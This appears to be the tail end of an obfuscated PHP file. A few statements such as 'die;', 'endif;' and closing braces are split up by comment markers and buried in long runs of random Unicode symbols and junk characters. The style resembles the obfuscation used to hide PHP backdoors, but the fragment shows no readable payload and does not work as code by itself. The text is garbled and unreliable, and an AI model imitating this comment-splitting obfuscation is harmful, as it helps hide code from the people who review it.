M+FXL▲┏╘⋪﹠➬ℎ✫⊶♣↠✛ⓠ➧→✉┻∛✈⊦{


-*///
);/*-


（↵⒑≨


<P%Ar3[-[（↵⒑≨


-*///
/*-
▕↝◈⒍➀º⇏✚╢㊭Ⓞ⋏❤∝┹ℓ◒▻↞㈩□⋰∮
l|8R8QJsx▕↝◈⒍➀º⇏✚╢㊭Ⓞ⋏❤∝┹ℓ◒▻↞㈩□⋰∮
-*///
die;/*-@U^[JuJ0&-*///
 endif;/*-X^.J-*///
 }/*-

╉☳▫┛╒▆⇔⋒⇁⊩▼▵≩⒣⋄◪⋿ℌ℅⒱⑷✕∋✃◗☜

&.l(kMWZ╉☳▫┛╒▆⇔⋒⇁⊩▼▵≩⒣⋄◪⋿ℌ℅⒱⑷✕∋✃◗☜

-*///
}/*-


┅☚↹↸➒﹡㊘①♓㊙➆╗Ⅲ


9wBpol┅☚↹↸➒﹡㊘①♓㊙➆╗Ⅲ


-*///
qU/*-uz-*///
::/*-
⓯▎ø﹦✎ℱⅿ⌘㊆∘╏
PjeBZS⓯▎ø﹦✎ℱⅿ⌘㊆∘╏
-*///
sbH/*-a;-*///
();/*-4h4Xe)d-*///
 ?>